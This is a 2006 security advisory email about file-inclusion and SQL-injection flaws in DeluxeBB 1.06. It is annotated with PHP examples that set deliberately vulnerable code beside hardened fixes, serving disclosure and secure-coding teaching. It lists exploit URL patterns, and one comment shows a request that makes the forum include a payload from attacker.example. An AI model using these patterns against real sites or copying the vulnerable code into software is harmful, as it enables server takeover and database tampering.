From: SecuriTeam <support@securiteam.com>
To: [email protected]
Date: 30 Aug 2006 15:10:15 +0200
Subject: [UNIX] DeluxeBB SQL Injection and File Inclusion Vulnerabilities
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060830124202.BC9CE5790@mail.tyumen.ru>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
DeluxeBB SQL Injection and File Inclusion Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.deluxebb.com/> DeluxeBB features "lots of security options
all over the board (like CP logs, Admin Restrictions, Database Backup
System, Email Bot protection, hide email option, user groups) but most
important is the speed". Secunia Research has discovered some
vulnerabilities in DeluxeBB, which can be exploited by malicious people to
conduct SQL injection attacks and compromise a vulnerable system.
DETAILS
Vulnerable Systems:
* DeluxeBB version 1.06
1) Input passed to the "templatefolder" parameter in various scripts isn't
properly verified before it is used to include files. This can be
exploited to include arbitrary files from external and local resources
(remote and local file inclusion); in the remote case this means running
attacker-supplied PHP code with the privileges of the web server.
Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
Successful exploitation requires that "register_globals" is enabled: the
scripts use $templatefolder as a plain global variable rather than reading
$_GET, and PHP only fills such variables from the request under that
setting. Including files from external resources additionally requires the
installation to allow URL wrappers in include() ("allow_url_fopen" on PHP
versions before 5.2, "allow_url_include" from 5.2 on); local file inclusion
needs only "register_globals".
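The following is an added illustration of the issue-1 pattern and its fix, written for current PHP; it is not DeluxeBB's code, and the script layout, the header.php file name, the TEMPLATE_BASE directory and the allowlist contents are assumptions. It shows why register_globals matters: under that setting PHP creates $templatefolder from the query string before the script runs, so an unvalidated include built from that variable is attacker-controlled.

```php
<?php
// Added illustration of the issue-1 pattern; not DeluxeBB code.
// Assumed: each template script includes a sub-file from a directory
// named by $templatefolder. With register_globals=On, a request such as
//   postreply.php?templatefolder=http://attacker.example/payload
// sets $templatefolder before any line of the script executes.

// --- Vulnerable shape (assumed) -------------------------------------
function vulnerable_header(): void
{
    global $templatefolder;                    // populated from the request under register_globals
    include $templatefolder . '/header.php';   // a remote URL or ../ traversal passes straight through
}

// --- Hardened shape --------------------------------------------------
// 1. Read the value explicitly instead of trusting a global.
// 2. Map it onto a fixed allowlist of installed template names.
// 3. Build the path from a server-side base directory and verify that the
//    resolved path is still inside it.
define('TEMPLATE_BASE', __DIR__ . '/templates');  // assumed layout

function safe_template_dir($requested): string
{
    $allowed = ['default', 'deluxe'];          // names that appear in the advisory URLs
    $name = (is_string($requested) && in_array($requested, $allowed, true)) ? $requested : 'default';

    $base = realpath(TEMPLATE_BASE);
    $dir  = realpath(TEMPLATE_BASE . '/' . $name);
    if ($base === false || $dir === false || strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('template directory missing or outside ' . TEMPLATE_BASE);
    }
    return $dir;
}

function safe_header(): void
{
    include safe_template_dir($_GET['templatefolder'] ?? null) . '/header.php';
}

// php.ini settings that remove the remaining attack surface even if a
// similar bug is reintroduced elsewhere:
//   register_globals  = Off   ; default since PHP 4.2, removed in PHP 5.4
//   allow_url_include = Off   ; PHP >= 5.2: URLs in include/require are refused
//   allow_url_fopen   = Off   ; before 5.2 this alone governed remote include
```

The realpath() comparison is deliberate defence in depth: the allowlist already prevents traversal, but the check also catches a symlinked template directory pointing outside the base, and it fails closed (exception) rather than silently falling back to the default template when the directory is missing.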
2) Input passed to the "hideemail", "languagex", "xthetimeoffset", and
"xthetimeformat" parameters when registering for an account isn't properly
sanitised before being used in a SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
Successful exploitation requires that "magic_quotes_gpc" is disabled, which
indicates that the values land inside quoted string literals in the query.
With the setting enabled, PHP backslash-escapes quotes in request data
before the script sees them, which blocks breaking out of such a literal;
it is not a fix (the setting is deprecated in PHP 5.3 and removed in 5.4),
and it does nothing for values interpolated without quotes.
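Added illustration of the issue-2 pattern and its fix, using PHP's mysqli extension; it is not DeluxeBB's code. The table and column names, the set of installed languages and the accepted value ranges are assumptions; only the four parameter names come from the advisory. The vulnerable form interpolates POSTed values into quoted string literals, which is exactly the situation in which magic_quotes_gpc would have interfered with an attack; the hardened form validates each value against the narrowest shape it can have and binds it as a parameter, so quoting settings no longer matter.

```php
<?php
// Added illustration of the issue-2 pattern; not DeluxeBB code.
// Assumed: registration inserts into a `members` table with the columns
// used below. Only the parameter names come from the advisory.

// --- Vulnerable shape (assumed) -------------------------------------
function vulnerable_register(mysqli $db, array $post): bool
{
    $sql = "INSERT INTO members (name, hideemail, languagex, timeoffset, timeformat)
            VALUES ('{$post['name']}', '{$post['hideemail']}', '{$post['languagex']}',
                    '{$post['xthetimeoffset']}', '{$post['xthetimeformat']}')";
    // With magic_quotes_gpc=Off, a single quote inside any of these values
    // ends the literal and whatever follows it is parsed as SQL: the
    // attacker controls the statement, not just a value.
    return $db->query($sql) === true;
}

// --- Hardened shape --------------------------------------------------
function hardened_register(mysqli $db, array $post): bool
{
    // Validate: each field gets the narrowest type or allowlist that fits it.
    $hideemail  = (($post['hideemail'] ?? '0') === '1') ? 1 : 0;           // boolean flag
    $languages  = ['english', 'german', 'french'];                          // assumed install
    $languagex  = in_array($post['languagex'] ?? '', $languages, true)
                ? $post['languagex'] : 'english';
    $offset     = filter_var($post['xthetimeoffset'] ?? 0, FILTER_VALIDATE_INT,
                    ['options' => ['min_range' => -12, 'max_range' => 14, 'default' => 0]]);
    $timeformat = (($post['xthetimeformat'] ?? '12') === '24') ? '24' : '12';
    $name       = is_string($post['name'] ?? null) ? $post['name'] : '';
    if ($name === '' || strlen($name) > 32) {
        return false;
    }

    // Bind: the values travel separately from the SQL text, so a quote in
    // $name (or in any other field) is data, never syntax.
    $stmt = $db->prepare(
        'INSERT INTO members (name, hideemail, languagex, timeoffset, timeformat)
         VALUES (?, ?, ?, ?, ?)'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('sisis', $name, $hideemail, $languagex, $offset, $timeformat);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```

Validation and parameterisation are both kept on purpose: binding alone stops the injection, but mapping hideemail, languagex and the time fields onto their legitimate domains also means a stored value can never carry attacker-chosen text into later pages or queries.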
The vulnerabilities have been confirmed in version 1.06. Other versions
may also be affected.
Solution:
Edit the source code to ensure that input is properly sanitised and
verified.
Time Table:
26/05/2006 - Initial vendor notification.
14/06/2006 - Public disclosure.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2914>
CVE-2006-2914 (issue 1, file inclusion via "templatefolder")
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2915>
CVE-2006-2915 (issue 2, SQL injection in the registration parameters)
ADDITIONAL INFORMATION
The information has been provided by <mailto:vuln-remove@secunia.com>
Secunia Research.
The original article can be found at:
<http://secunia.com/secunia_research/2006-44/advisory/>
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.